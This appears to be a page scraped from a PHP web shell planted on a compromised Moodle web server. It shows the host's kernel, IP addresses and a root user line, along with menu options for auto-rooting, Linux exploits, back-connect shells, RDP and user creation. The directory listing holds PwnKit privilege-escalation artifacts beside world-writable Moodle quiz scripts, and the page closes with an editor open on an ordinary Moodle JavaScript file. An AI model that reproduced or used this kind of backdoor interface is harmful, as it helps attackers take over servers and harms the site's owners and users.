Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
quiz /
amd /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_question_modal_launcher.mi...
931
B
-rwxrwxrwx
add_question_modal_launcher.mi...
3.77
KB
-rwxrwxrwx
add_random_form.min.js
2.14
KB
-rwxrwxrwx
add_random_form.min.js.map
9.35
KB
-rwxrwxrwx
add_random_question.min.js
772
B
-rwxrwxrwx
add_random_question.min.js.map
2.61
KB
-rwxrwxrwx
modal_add_random_question.min....
4.53
KB
-rwxrwxrwx
modal_add_random_question.min....
13.67
KB
-rwxrwxrwx
modal_quiz_question_bank.min.j...
3.92
KB
-rwxrwxrwx
modal_quiz_question_bank.min.j...
13.92
KB
-rwxrwxrwx
preflightcheck.min.js
1.73
KB
-rwxrwxrwx
preflightcheck.min.js.map
5.82
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
quizquestionbank.min.js
612
B
-rwxrwxrwx
quizquestionbank.min.js.map
1.86
KB
-rwxrwxrwx
random_question_form_preview.m...
2.89
KB
-rwxrwxrwx
random_question_form_preview.m...
11.29
KB
-rwxrwxrwx
repaginate.min.js
678
B
-rwxrwxrwx
repaginate.min.js.map
2
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : preflightcheck.min.js
/** * This class manages the confirmation pop-up (also called the pre-flight check) * that is sometimes shown when a use clicks the start attempt button. * * This is also responsible for opening the pop-up window, if the quiz requires to be in one. * * @module mod_quiz/preflightcheck * @class preflightcheck * @package mod_quiz * @copyright 2016 The Open University * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later * @since 3.1 */ define("mod_quiz/preflightcheck",["jquery","core/yui"],(function($,Y){var t={confirmDialogue:null,init:function(startButton,confirmationTitle,confirmationForm,popupoptions){var finalStartButton=startButton;Y.use("moodle-core-notification",(function(){Y.one(confirmationForm)&&(t.confirmDialogue=new M.core.dialogue({headerContent:confirmationTitle,bodyContent:Y.one(confirmationForm),draggable:!0,visible:!1,center:!0,modal:!0,width:null,extraClasses:["mod_quiz_preflight_popup"]}),Y.one(startButton).on("click",t.displayDialogue),Y.one("#id_cancel").on("click",t.hideDialogue),finalStartButton=t.confirmDialogue.get("boundingBox").one('[name="submitbutton"]')),popupoptions&&Y.one(finalStartButton).on("click",t.launchQuizPopup,t,popupoptions)}))},displayDialogue:function(e){e&&e.halt(),t.confirmDialogue.show()},hideDialogue:function(e){e&&e.halt(),t.confirmDialogue.hide(e)},launchQuizPopup:function(e,popupoptions){e.halt(),Y.use("moodle-core-formchangechecker","io-form",(function(){M.core_formchangechecker.reset_form_dirty_state();var form=e.target.ancestor("form");window.openpopup(e,{url:form.get("action")+"?"+Y.IO.stringify(form).replace(/\bcancel=/,"x="),windowname:"quizpopup",options:popupoptions,fullscreen:!0})}))}};return t})); //# sourceMappingURL=preflightcheck.min.js.map
Close